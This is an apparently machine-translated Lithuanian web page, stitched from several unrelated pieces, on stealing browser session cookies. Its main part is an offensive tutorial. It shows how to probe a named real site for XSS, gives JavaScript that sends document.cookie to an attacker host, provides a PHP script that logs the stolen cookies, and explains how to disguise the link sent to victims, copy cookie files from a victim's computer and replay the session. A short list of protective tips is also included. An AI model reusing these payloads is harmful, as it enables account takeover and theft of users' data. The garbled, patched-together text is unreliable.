Mano draugas pamiršo vienos svetainės slaptažodį. Tačiau jis anksčiau prisijungdamas pažymėjo laukelį „Prisiminti mane“. Google naršyklė„Chrome“, kuri leido jam prisijungti prie savo paskyros svetainės. Manęs paklausė, ar šią magišką būseną galima perkelti į kitą kompiuterį. Žinoma, teisingiau būtų pakeisti ar atkurti slaptažodį, tačiau pažįstamas negalėjo to padaryti dėl su byla nesusijusių priežasčių.

Kaip naudoti intercepter-ng manekenams

Nepaisant daugybės šiuolaikinės programinės įrangos pasirinkimo, sunku rasti geresnių įsilaužimo programų, skirtų „Android“, nei „intercepter ng“. Pirmas kriterijus, nurodantis šio produkto naudai, yra jo tikrasis veikimas. Dauguma tinkle siūlomų uostytojų yra tik imitacija, kuri neatlieka deklaruotų funkcijų.

Kitas teigiamas veiksnys yra programos universalumas ir plačios vartotojų auditorijos aprėptis.

Pagalba kompiuteriui 939-29-71

Pradėkime eilės tvarka. Slapukai arba „slapukai“ yra labai maži tekstiniai failai – žymės su informacija.

Žiniatinklio serveris siunčia šią informaciją į vartotojo naršyklę. kur ši informacija saugoma tol, kol to prireiks. Ne visai aišku. Na. GERAI.

Pasistengsiu padaryti dar lengviau. Pamatyti. užsiregistravote bet kurioje svetainėje.

Registracijos metu sukuriami būtent šie „slapukai“.

Jie yra čia.

Cookie Cadger

Programa klausosi srauto WiFi tinkle, perima slapukus ir kartoja vartotojo seansą jūsų naršyklėje, kartodama užklausas su jo kredencialais. Autorius Matthew Sullivanas pristatė programos pristatymą rugsėjo 30 d. Derbycon programišių konferencijoje. Kalbos metu Matthew Sullivan per „Wi-Fi“ perėmė neapsaugotą vieno iš konferencijos dalyvių sesiją su „Google“.

Kaip pavogti sausainius

Jei būdami svetainės puslapyje įvesite adreso juosta Firefox naršyklė arba Opera šį tekstą: javascript:document.write(document.cookie); pamatysite kažką panašaus į: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixwall=0; remixInformation=0; remixMembersBar=0; remikso aprašymas=0; remixautobookmark=8; remixemail=*******; remixmid = 23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Dėmesio! .

Visas kelių svetainių scenarijų kūrimo vadovas

XSS yra pažeidžiamumo tipas programinė įranga, sukurta žiniatinklio programoms, leidžianti užpuolikui įterpti kliento scenarijų į kitų vartotojų peržiūrėtus tinklalapius. apeinant saugumo apribojimus naršyklėje)“ leidžia užpuolikui įterpti kliento scenarijų į kitų vartotojų peržiūrėtus tinklalapius.

Skirtumas tarp slapukų ir seansų

Ne taip seniai parašiau straipsnį apie tai, kaip registruotis ir įgalioti vartotojus svetainėje.

“. Šiame straipsnyje paaiškinsiu skirtumą tarp seansų ir slapukų. kad padarytumėte galutinį pasirinkimą.

Slapukai. Ne, tai ne apie slapukus, o apie jūsų saugumą. Taigi jūs einate į savo mėgstamą svetainę „vkontakte“ (arba, pavyzdžiui, žiūrite paštą) kieno nors kito kompiuteryje, atsisakote parinkties „Išsaugoti slaptažodį“, laimingai žiūrite paštą ir išeinate. Ir negalvokite apie tai, kad savo vardu dabar galite eiti į Socialinis tinklas arba paštu.

Aš net negalvoju apie situaciją, kai programa įsimena slaptažodį jums to nežinant. Tai jau tyčinis įsilaužimas, ir tikriausiai įtarsite, kad kažkas panašaus gali nutikti ir tokiu kompiuteriu neisite į mėgstamą svetainę. Bet galime kalbėti apie paprastą žmogišką smalsumą – buvome pas draugus, o paskui dar kartą, ir jie gauna galimybę perskaityti tavo paštą. Ar esate tikri, kad jie atsisakys tokios galimybės? Ar nebijote, kad kažkas nutiks? Bet kokiu atveju, moralės klausimus atidėsiu į šalį ir pakalbėsiu tik apie tai, kaip kompiuteryje saugoma informacija, kurią dabar galima įleisti į kokią nors svetainę neprašant slaptažodžio.

kaip pavogti sausainius

Ir šios technologijos pavadinimas yra slapukai.

Ir čia viskas prasidėjo. http protokolas, kuriuo iš tikrųjų naršote svetaines (įskaitant šią), iš pradžių nereiškė galimybės palaikyti ryšį. Tai yra, grubiai tariant, jūs išsiunčiate užklausą į svetainę, gaunate atsakymą, jis rodomas ekrane, o tada serveris nieko apie jus neprisimena. Žinoma, tai gerai, kai svetainė yra tik informacinė ir neturėtų nieko prisiminti apie jus, bet mes gyvename Web 2.0 amžiuje 😉 Natūrali protokolo raida yra POST ir GET užklausos, kai siunčiate kokius nors duomenis, serveris gali įrašyti juos į duomenų bazės duomenis, bet to nepakanka.

Pažiūrėkime į labai paprastą pavyzdį. Forumas. Taigi užsiregistravote, o forume yra įrašas, kad yra toks ir toks vartotojas su tokiu ir tokiu slaptažodžiu ir dar kažkokiais papildomais duomenimis. Bet dabar eini į forumą ir prisijungi – įveskite slaptažodį. Kažkur turėtų būti informacija, kad esate prisijungęs. Serveryje? Žinoma ne! Neįmanoma serveryje išsaugoti informacijos, kad autorizacija buvo atlikta iš jūsų kompiuterio – jis negalės jūsų atskirti nuo kito asmens (net jūsų IP adresas neidentifikuoja jūsų vienareikšmiškai)! Taigi informacija apie autorizaciją turi būti saugoma jūsų kompiuteryje. Tam ir yra slapukai, tam jie ir sukurti.

Slapukas yra nedidelis įrašas jūsų kompiuteryje, kuriame saugoma informacija apie svetainę, kurioje lankėtės. Gavus autorizaciją, sukuriamas panašus įrašas, po kurio jau gali vaikščioti po forumą, ir jis tave atpažins. Tačiau tai jau įvyks automatiškai – dėl slapuke saugomos informacijos – todėl apsimesti, kad esate pagrindinis forumo administratorius, vis tiek nepavyks apeiti slaptažodžio patikrinimo.

Dabar galime grįžti prie šio straipsnio pradžios. Jei kažkur prisijungėte net neišsaugoję slaptažodžio, gali atsitikti taip, kad kompiuteryje buvo sukurtas įrašas, leidžiantis įvesti šį šaltinį savo vardu be leidimo. Pats toks įrašas po kurio laiko pasens, tačiau galite priversti jį išvalyti. Kiekviena naršyklė tai daro skirtingai, aš parodysiu, kaip tai padaryti mano mėgstamiausioje Google Chrome. Parinkčių atidarymas

Eikite į skirtuką „Išplėstinė“ ir raskite mygtuką „Rodyti slapukus“.

Dabar, žinoma, galite ištrinti visus slapukus, tačiau tai gali nuliūdinti kompiuterio savininką. Todėl, pavyzdžiui, viršutiniame laukelyje galite įvesti jus dominančios svetainės pavadinimą

Tada galima išvalyti tik su šia svetaine susijusius slapukus. Galite pabandyti mano. Be to, jei prisijungsite prie mano forumo ir išvalysite slapukus, autorizacijos informacija bus pamiršta. Pabandyk tai!

komentarus maitina

1. Kas yra XSS
XSS tipo pažeidžiamumas leidžia įterpti savavališką JavaScript kodą į puslapio turinį. XSS ataka skiriasi nuo kitų (pvz., SQL injekcija arba PHP injekcija) tuo, kad veikia ne serveryje, o kliente.

kaip pavogti sausainius

Su jo pagalba negalite peržiūrėti duomenų bazių lentelių, įkelti apvalkalo ir pan. Dažniausias XSS naudojimas yra slapukų vagystė.
Slapukai (Cookies) – nedidelė duomenų dalis, sukurta žiniatinklio serverio ir saugoma vartotojo kompiuteryje kaip failas. Paprastai slapukai naudojami paskyroms saugoti ir dažniausiai juose yra užkoduotas slaptažodis, prisijungimo vardas ir seanso ID. (Nors ne visada)
XSS yra dviejų tipų: aktyvus ir pasyvus.

Pasyvus XSS reikalauti, kad auka dalyvautų tiesiogiai, pavyzdžiui, sekite nuorodą, kurioje yra javascript kodas. Naudodami šio tipo XSS neapsieisite be SI (socialinės inžinerijos)

Aktyvus XSS nereikalauja jokio aukos dalyvavimo, jai tereikia eiti į puslapį su XSS. Aktyvus XSS gali būti, pavyzdžiui, forumo įrašuose, pokalbiuose, pridedant naujienų ir pan.

2. Ieškokite XSS
Šioje pastraipoje aš jums pasakysiu, kaip rasti xss

2.1 Pasyvus XSS
Norėdami rasti pasyvųjį XSS, tiesiog pakeiskite jį įvesties formoje jei scenarijus veikė ir pasirodė pranešimas "xss", pažeidžiamumas yra, jei scenarijus neveikė, vis tiek galite pabandyti ">, tai turbūt labiausiai paplitęs xss pažeidžiamumas. Jei nei vienas, nei kitas scenarijus neveikė, greičiausiai pažeidžiamumo nėra.
Pažiūrėkime į pavyzdį.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Matote „paieškos“ formą? įdėti ten "> ir spustelėkite "rasti"
Išskrido langas su xss, o tai reiškia, kad xss yra. (Galbūt tuo metu, kai skaitysite šį straipsnį, šis xss jau bus ištaisytas)

2.2 Aktyvus XSS
Toks CSS gali būti, pavyzdžiui, profilio laukuose, pridedant naujienas naujienų pavadinime ir pačioje naujienoje (rečiau), pranešimuose forumuose / pokalbiuose / svečių knygose su įjungtu html. Čia viskas paprasta, į laukus įvedame scenarijų iš ankstesnės pastraipos, o jei ekrane rodomas pranešimas, vadinasi, pažeidžiamumas yra.
Apsvarstykite xss BB žymose forumuose.
galite pabandyti kvailai įterpti javascript kodą į žymą, pavyzdžiui:
javascript:alert('xss')
Kai kurios žymos turi parametrus, pavyzdžiui, žymoje yra dynsrc ir lowsrc parametrai, pabandykime kodą pakeisti taip:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
Jei scenarijus veikė, xss yra

3. XSS naudojimas slapukams pavogti
Dabar skaniausias
Norint pavogti slapukus, mums reikia žiniatinklio snifferio, savo priegloboje galite įdiegti kokį nors snifferį arba galite naudoti internetinį snifferį, kuris dabar yra pilnas.
Kad pavogtų slapukus per pasyvųjį XSS, auka turi vadovautis nuodinga nuoroda. Norėdami pavogti slapukus, mes juos naudosime kitas scenarijus:
pakeičiame nuorodoje esantį scenarijų ir leidžiame aukai sekti, pamatyti uostymo žurnalą ir džiaugtis.
Pažiūrėkime į pavyzdį.
Paimkime tą XSS ant ramblerio iš ankstesnės pastraipos.
Įklijuoti
">
paieškos formoje spustelėkite „rasti“, pažiūrėkite į adreso juostą ir pamatysite:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Mes metame šią nuorodą aukai ir mėgaujamės sausainiais.
Pamatęs tokią nuorodą, nukentėjusysis gali kažką įtarti, todėl patartina užkoduoti
">
URL Arba naudokite tokias paslaugas kaip http://tinyurl.com/
Pereikime prie aktyvaus XSS, čia viskas paprasta, vietoj alert() įterpiame img = new Image(); img.src = "sniffer image address"+document.cookie;

Dabar turime sausainių. Bet ką su jais daryti? Tai paprasta, juos reikia pakeisti, o ne savo. AT Opera naršyklė yra įmontuotas slapukų rengyklė (įrankiai-> išplėstinis-> slapukų valdymas), yra Firefox įskiepis (nepamenu pavadinimo, naudok google)
Kol kas tiek, galbūt straipsnis bus papildytas

Į klausimą Kaip gauti COOKIES slapukus. Reikia slapukų, kaip gauti, pasakykite man!!! 1 autoriaus rinkinys Vladas eeeeeeeeeeeeeee geriausias atsakymas yra Kas yra slapukai?
Faktas yra tas, kad kuriant www technologijas ir diegiant programavimo kalbas internete, programų kūrėjams iškilo labai rimta problema - kaip išsaugoti algoritmo vykdymo rezultatus kiekvienam konkrečiam vartotojui. ilgam laikui? Pats HTTP protokolas neturi galimybės užfiksuoti programinės įrangos procesų rezultatų. Seansų naudojimas taip pat nėra problemos sprendimas, nes nutrūkus ryšiui su serveriu, jų veiksmas nutraukiamas iš karto.
Problema buvo išspręsta įdiegus slapukų mechanizmą (tai yra, išvertus iš anglų kalbos, „slapukai“). Slapukai turi nepaprastą savybę – jie yra saugomi vartotojo kietajame diske ir gali būti ten saugomi beveik neribotą laiką.
Iš esmės slapukai yra paprasto teksto failai, saugomi specialiame naršyklės naudojamame kataloge (dažniausiai vadinamame laikinaisiais interneto failais), ir juos galite pamatyti apsilankę šiame kataloge ( greita prieiga prie jo IE naršyklei atliekami meniu elementai Įrankiai -> Interneto parinktys -> Laikini interneto failai -> Nustatymai -> Rodinys
Kai kurie slapukai gali būti saugomi tik vieną seansą, jie ištrinami uždarius naršyklę. Kiti, nustatyti tam tikram laikui, įrašomi į failą. Paprastai šis failas vadinamas „cookies.txt“ (tačiau jų gali būti keli) ir yra kompiuteryje įdiegtos naršyklės darbiniame kataloge.
kitaip tariant
Slapukas yra nedidelė tekstinės informacijos dalis, kurią serveris siunčia naršyklei. Savaime slapukai nieko negali padaryti, tačiau vartotojui prisijungus prie serverio (naršyklės eilutėje įvedus savo adresą), serveris gali perskaityti slapukuose esančią informaciją ir, remdamasis jos analize, atlikti bet kokius veiksmus. Pavyzdžiui, esant autorizuotai prieigai prie kažko per internetą, prisijungimo vardas ir slaptažodis seanso metu išsaugomi slapukuose, todėl vartotojas gali jų nebeįvesti, kai prašo kiekvieno slaptažodžiu apsaugoto dokumento.
Jei per šią temą bandote pasiekti kažkieno slaptažodžiu apsaugotas paskyras, turite rasti būdą nuotoliniu būdu (trojos arklys) arba įžūliai nukopijuodami į „flash drive“, jei turite prieigą prie kompiuterio, kuriame dirba auka, nukopijuokite šį cookie.txt failą ir pakeiskite jį savo (toje pačioje) naršyklėje. Tada einate į norimą svetainę, kurioje jus domina paskyra, ir automatiškai gaunate prieigą. Tačiau atminkite, kad jei auka darbo pabaigoje paspaus išėjimą iš paskyros (pavyzdžiui, iš pašto), seanso informacija bus ištrinta slapukuose ir jūs negausite prieigos.
„Mozilla Firefox“ saugo slapukus vartotojo profilyje, faile C:Documents and SettingsUsernameApplication DataMozillaFirefoxProfiles<имя профиля>cookies.txt
nternet explorer išsaugo šiuos slapukus kaip atskirus tekstinius failus aplanke C:Documents and SettingsUsernameCookies
„Opera“ saugo slapukus faile C:Documents and SettingsUsernameApplication DataOperaOperaprofilecookies4.dat

Slapukai - informacija tekstinio failo forma, kurią svetainė saugo vartotojo kompiuteryje. Yra autentifikavimo duomenys (prisijungimo vardas / slaptažodis, ID, telefono numeris, adresas pašto dėžutę), vartotojo nustatymus, prieigos būseną. Saugomas naršyklės profilyje.

Slapukų įsilaužimas yra lankytojo seanso žiniatinklio šaltinyje vagystė (arba „užgrobimas“). Slapta informacija tampa prieinama ne tik siuntėjui ir gavėjui, bet ir trečiajai šaliai – perėmėnčiam asmeniui.

Slapukų įsilaužimo įrankiai ir būdai

Kompiuterių vagys, kaip ir jų kolegos realiame gyvenime, be įgūdžių, miklumo ir žinių, žinoma, turi ir savo įrankius – savotišką pagrindinių raktų ir zondų arsenalą. Susipažinkime su populiariausiomis programišių gudrybėmis, kuriomis jie iš interneto gyventojų gaudo slapukus.

Uostytojai

Specialios programos stebėti ir analizuoti tinklo srautą. Jų pavadinimas kilęs iš anglų kalbos veiksmažodžio „sniff“ (sniff), nes. tiesiogine to žodžio prasme „nuuostyti“ perduodamus paketus tarp mazgų.

Tačiau užpuolikai naudoja uostiklį, kad perimtų seanso duomenis, pranešimus ir kt Konfidenciali informacija. Jų atakų objektas dažniausiai yra nesaugūs tinklai, kur slapukai siunčiami atviroje HTTP sesijoje, tai yra praktiškai nėra užšifruoti. (Viešasis „Wi-Fi“ yra labiausiai pažeidžiamas.)

Šie metodai naudojami norint įterpti snifferį į interneto kanalą tarp vartotojo prieglobos ir žiniatinklio serverio:

  • tinklo sąsajų (koncentratorių, komutatorių) „klausymas“;
  • srauto šakojimas ir kopijavimas;
  • prisijungimas prie tinklo kanalo pertraukos;
  • analizė per specialias atakas, kurios nukreipia aukų srautą į uostytoją (MAC-spoofing, IP-spoofing).

Santrumpa XSS reiškia Cross Site Scripting. Jis naudojamas atakuoti svetaines, siekiant pavogti vartotojo duomenis.

XSS veikia taip:

  • užpuolikas įveda kenkėjišką kodą (specialų užmaskuotą scenarijų) į svetainės tinklalapį, forumą arba į pranešimą (pavyzdžiui, kai kalbasi socialiniame tinkle);
  • auka apsilanko užkrėstame puslapyje ir suaktyvėja nustatyti kodą kompiuteryje (spustelėkite, sekite nuorodą ir pan.);
  • savo ruožtu suaktyvintas kenkėjiškas kodas „ištraukia“ iš naršyklės slaptus vartotojo duomenis (ypač slapukus) ir siunčia juos į užpuoliko žiniatinklio serverį.

Siekdami „įdiegti“ programinės įrangos XSS mechanizmą, įsilaužėliai naudoja įvairiausias žiniatinklio serverių, internetinių paslaugų ir naršyklių spragas.

Visi XSS pažeidžiamumai skirstomi į du tipus:

  • Pasyvus. Ataka gaunama užklausus konkretų tinklalapio scenarijų. Kenkėjiškas kodas galima įvesti įvairiomis formomis tinklalapyje (pavyzdžiui, svetainės paieškos juostoje). Labiausiai jautrūs pasyviam XSS yra ištekliai, kurie nefiltruoja HTML žymų, kai gaunami duomenys;
  • Aktyvus. Įsikūręs tiesiai serveryje. Ir jie aktyvuojami aukos naršyklėje. Juos sukčiai aktyviai naudoja įvairiuose tinklaraščiuose, pokalbiuose ir naujienų kanaluose.

Piratai kruopščiai „užmaskuoja“ savo XSS scenarijus, kad auka nieko neįtartų. Jie pakeičia failo plėtinį, perduoda kodą kaip vaizdą, motyvuoja sekti nuorodą, pritraukia įdomiu turiniu. Rezultatas: kompiuterio vartotojas, nesusitvarkęs su savo smalsumu, savo ranka (su pelės paspaudimu) siunčia seanso slapukus (su prisijungimo vardu ir slaptažodžiu!) XSS scenarijaus autoriui - kompiuterio piktadarys.

Slapukų klastojimas

Visi slapukai yra saugomi ir siunčiami į žiniatinklio serverį (iš kurio jie „atkeliavo“) be jokių pakeitimų – pradine forma – su tomis pačiomis reikšmėmis, eilutėmis ir kitais duomenimis. Tyčinis jų parametrų keitimas vadinamas slapukų klastojimu. Kitaip tariant, kai slapukas suklastotas, užpuolikas galvoja apie norus. Pavyzdžiui, atliekant mokėjimą internetinėje parduotuvėje, mokėjimo suma slapuke pakeičiama į mažesnę pusę – taip „sutaupoma“ perkant.

Pavogti seanso slapukai socialiniame tinkle iš kažkieno paskyros „įterpiami“ į kitą sesiją ir kitame kompiuteryje. Pavogtų sausainių savininkas gauna pilna prieigaį aukos paskyrą (susirašinėjimas, turinys, puslapio nustatymai), kol ji yra savo puslapyje.

Slapukų „redagavimas“ atliekamas naudojant:

  • „Opera“ naršyklės funkcijos „Tvarkyti slapukus...“;
  • priedai Cookies Manager ir Advanced Cookie Manager for FireFox;
  • „IECookiesView“ paslaugų programos (tik „Internet Explorer“);
  • teksto redaktorius kaip „AkelPad“, „Notepad“ ar „Windows“ užrašų knygelė.

Fizinė prieiga prie duomenų

Labai paprasta grandinėįgyvendinimas susideda iš kelių etapų. Bet tai veiksminga tik tuo atveju, jei aukos kompiuteris su atvira sesija, pavyzdžiui, „Vkontakte“, paliekamas be priežiūros (ir gana ilgą laiką!):

  1. Įveskite naršyklės adreso juostą javascript funkcija, kuriame rodomi visi išsaugoti slapukai.
  2. Paspaudus „ENTER“, jie visi pasirodo puslapyje.
  3. Slapukai nukopijuojami, išsaugomi faile ir perkeliami į „flash drive“.
  4. Kitame kompiuteryje slapukai pakeičiami naujoje sesijoje.
  5. Atidaroma prieiga prie aukos sąskaitos.

Paprastai įsilaužėliai naudoja aukščiau nurodytus įrankius (ir kitus) ir kartu (nes daugelio žiniatinklio išteklių apsaugos lygis yra gana aukštas), ir atskirai (kai vartotojai yra pernelyg naivūs).

XSS + uostiklis

  1. Sukuriamas XSS scenarijus, kuriame nurodomas internetinio snifferio (savo gamybos ar konkrečios paslaugos) adresas.
  2. Kenkėjiškas kodas išsaugomas su plėtiniu .img (vaizdo formatas).
  3. Tada šis failas įkeliamas į svetainės puslapį, pokalbį arba asmeninę žinutę – kur bus įvykdyta ataka.
  4. Vartotojo dėmesį patraukia sukurti „spąstai“ (čia pradeda veikti socialinė inžinerija).
  5. Jei „spąstai“ veikia, uostytojas perima slapukus iš aukos naršyklės.
  6. Krekeris atidaro šnipinėjimo rąstus ir ištraukia pavogtus sausainius.
  7. Tada jis atlieka pakeitimą, kad gautų paskyros savininko teises naudodamas aukščiau nurodytus įrankius.

Slapukų apsauga nuo įsilaužimo

  1. Naudokite šifruotą ryšį (naudodami atitinkamus protokolus ir saugos metodus).
  2. Neatsakykite į abejotinas nuorodas, paveikslėlius, viliojančius pasiūlymus susipažinti su „nauja nemokama programine įranga“. Ypač iš nepažįstamų žmonių.
  3. Naudokite tik patikimus žiniatinklio išteklius.
  4. Užbaikite įgaliotą seansą paspausdami mygtuką „Atsijungti“ (o ne tik uždarykite skirtuką!). Ypač jei prie paskyros nebuvo prisijungta Asmeninis kompiuteris, bet, pavyzdžiui, iš kompiuterio interneto kavinėje.
  5. Nenaudokite naršyklės funkcijos „Išsaugoti slaptažodį“. Saugomi registracijos duomenys kartais padidina vagystės riziką. Nepatingėkite, negailėkite kelių minučių laiko slaptažodžiui įvesti ir prisijungimui kiekvieno užsiėmimo pradžioje.
  6. Po naršymo internete – apsilankymo socialiniuose tinkluose, forumuose, pokalbiuose, svetainėse – ištrinkite išsaugotus slapukus ir išvalykite naršyklės talpyklą.
  7. Reguliariai atnaujinkite naršykles ir antivirusinę programinę įrangą.
  8. Naudokite naršyklės plėtinius, kurie apsaugo nuo XSS atakų (pvz., NoScript for FF ir Google Chrome).
  9. Periodiškai sąskaitose.

O svarbiausia – ilsėdamiesi ar dirbdami internete nepraraskite budrumo ir dėmesio!

Kas yra sausainis?

Yra mechanizmas, leidžiantis http serveriui kai kuriuos duomenis saugoti vartotojo kompiuteryje tekstinė informacija ir tada susisiekite su ja. Ši informacija vadinamas sausainiu. Tiesą sakant, kiekvienas slapukas yra pora: parametro pavadinimas ir jo reikšmė. Kiekvienam slapukui taip pat priskiriamas domenas, kuriam jis priklauso. Saugumo sumetimais visose naršyklėse http serveriui leidžiama pasiekti tik savo domeno slapuką. Be to, slapukai gali turėti galiojimo pabaigos datą, tokiu atveju jie bus saugomi kompiuteryje iki šios datos, net jei visi naršyklės langai yra uždaryti.


Kodėl slapukai svarbūs?

Visose kelių vartotojų sistemose slapukai naudojami vartotojui identifikuoti. Tiksliau, dabartinis vartotojo ryšys su paslauga, vartotojo sesija. Jei kas nors atpažįsta jūsų slapukus, jis gali prisijungti jūsų vardu. Kadangi į Šis momentas labai nedaug interneto išteklių tikrina IP adreso pasikeitimą per vieną vartotojo seansą.


Kaip pakeisti ar pakeisti slapukus?

Naršyklės kūrėjai nepateikia integruotų slapukų redagavimo įrankių. Bet jūs galite apsieiti su įprastu bloknotu (notepad).


1 veiksmas: sukurkite tekstinis failas su tekstu

Windows Registro redaktorius 5.00 versija



@="C:\\IE_ext.htm"

Išsaugome jį pavadinimu IE_ext.reg

2 veiksmas: naudodami sukurtą failą pridėkite pakeitimus prie „Windows“ registro.

3 veiksmas: sukurkite tekstinį failą su tekstu

< script language="javascript">
external.menuArguments.clipboardData.setData("Tekstas" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= „testo pavadinimas=testo vertė; kelias=/; domenas=testdomenas.ru“;
alert(external.menuArguments.document.cookie);


Išsaugokite jį kaip C:\IE_ext.htm

4 veiksmas: einame į mus dominančią svetainę.

5 veiksmas: Dešiniuoju pelės mygtuku spustelėkite pelės paspaudimas laisva vieta puslapį ir pasirinkite meniu elementą „Darbas su slapukais“. Leiskite pasiekti iškarpinę. Jūsų šios svetainės slapukai bus patalpinti į mainų sritį. Galite įklijuoti jų užrašų knygelę (notepad) ir pamatyti.


6 veiksmas: norėdami pakeisti slapuką, redaguokite failą C:\IE_ext.htm, pakeisdami testo pavadinimas slapuko vardu, testo vertė- pagal jo reikšmę, testdomain.com- į svetainės domeną. Jei reikia, pridėkite daugiau tokių eilučių. Kad būtų patogiau valdyti, prie scenarijaus pridėjau esamų slapukų išvestį prieš ir po pakeitimo: alert(external.menuArguments.document.cookie);

7 veiksmas: dar kartą paleiskite 5 veiksmą ir atnaujinkite puslapį.

Apatinė eilutė: mes eisime į šį interneto šaltinį su atnaujintais slapukais.

Kaip pavogti slapukus naudojant „JavaScript“?

Jei užpuolikui pavyko rasti galimybę aukos kompiuteryje paleisti savavališką JavaScript scenarijų, tada perskaitykite dabartiniai slapukai jis gali labai lengvai. Pavyzdys:


varstr=document.cookie;

Bet ar jis galės juos perkelti į savo svetainę, nes, kaip minėjau anksčiau, JavaScript scenarijus negali papildomas patvirtinimas pasiekti svetainę, esančią kitame domene? Pasirodo, „JavaScript“ scenarijus gali įkelti bet kokį vaizdą, esantį bet kuriame http serveryje. Tuo pačiu metu į šią nuotrauką perkelkite visą atsisiuntimo užklausoje pateiktą tekstinę informaciją. Pavyzdys: http://hackersite.ru/xss.jpg?text_info Taigi, jei paleisite šį kodą:

varimg= newImage();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);


tada slapukai bus užklausoje atsisiųsti „paveikslėlį“ ir „palikti“ užpuolikui.

Kaip tvarkyti tokius prašymus įkelti „nuotrauką“?

Užpuolikui tereikia rasti prieglobą naudojant php palaikymas ir vietos kodas toks:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Tada visi šio scenarijaus užklausos parametrai bus išsaugoti faile log.txt. Jį reikia pakeisti tik anksčiau aprašytame „JavaScript“ scenarijuje http://hackersite.ru/xss.jpgį kelią į šį php scenarijų.


Rezultatas

Aš parodžiau tik paprasčiausią būdą išnaudoti XSS pažeidžiamumą. Tačiau tai įrodo, kad bent vienas toks pažeidžiamumas kelių vartotojų interneto svetainėje gali leisti užpuolikui naudoti savo išteklius jūsų vardu.

„Opera“ atidarykite pagrindinį meniu, eikite į skyrių „Nustatymai“ ir pasirinkite eilutę „ Bendrieji nustatymai...". Ir jūs galite tiesiog paspausti karštą CTRL klavišai+ F12. Taip atsidarys naršyklės nustatymų langas, kuriame skirtuke „Išplėstinė“ reikia spustelėti skiltį „Slapukai“ kairiojoje srityje. Jame turite spustelėti mygtuką „Tvarkyti slapukus“.

AT Mozilla Firefox meniu atidarykite skyrių „Įrankiai“ ir pasirinkite elementą „Nustatymai“. Nustatymų lange turite eiti į skirtuką „Privatumas“, ten rasti mygtuką „Rodyti slapukus...“ ir spustelėti jį, kad pasiektumėte naršyklės saugomų slapukų sąrašą. Čia jų galima ieškoti ir peržiūrėti.

„Internet Explorer“ meniu išplėskite skyrių „Įrankiai“ ir pasirinkite „Ypatybės“. Nuosavybės nustatymų lange eikite į skirtuką Bendra ir skiltyje Naršymo istorija spustelėkite mygtuką Parinktys. Tokiu būdu atidarysite kitą langą („Laikinosios failo parinktys“), kuriame turėsite spustelėti mygtuką „Rodyti failus“.

Atsidariusiame „Internet Explorer“ laikinųjų failų aplanko turinio sąraše spustelėkite antraštę „Vardas“ – tokiu būdu visus slapukus galėsite sugrupuoti į vieną bloką bendroje nevienalyčių failų krūvoje. Čia galite rasti dominantį failą ir atidaryti jį standartinėje užrašų knygelėje, kad galėtumėte peržiūrėti ar redaguoti.

„Google Chrome“ spustelėkite veržliarakčio piktogramą viršutiniame dešiniajame lango kampe ir meniu pasirinkite Parinktys. Naršyklė atidarys puslapį „Nustatymai“, o jūs spustelėsite nuorodą „Išplėstinė“ kairiojoje jos srityje, o išplėstinių nustatymų puslapyje spustelėkite mygtuką „Turinio nustatymai“. Dar ne paskutinis puslapis pakeliui į šios naršyklės saugomus slapukus.

Kitame puslapyje spustelėkite mygtuką „Visi slapukai ir svetainės duomenys“ ir pagaliau turėsite prieigą prie slapukų sąrašo.

Google Chrome suteikia galimybę ieškoti, peržiūrėti ir ištrinti slapukus.

„Safari“ naršyklėje spustelėkite krumpliaračio piktogramą dešinėje viršutiniame kampe ir pasirinkite eilutę „Nustatymai ...“. Nustatymų keitimo lange turite eiti į skirtuką „Sauga“, kad spusteltumėte ten esantį mygtuką „Rodyti slapukus“. „Safari“ teikia tik slapukų paieškos ir trynimo funkcijas, čia šių laikinųjų failų turinį galima pamatyti tik iš dalies.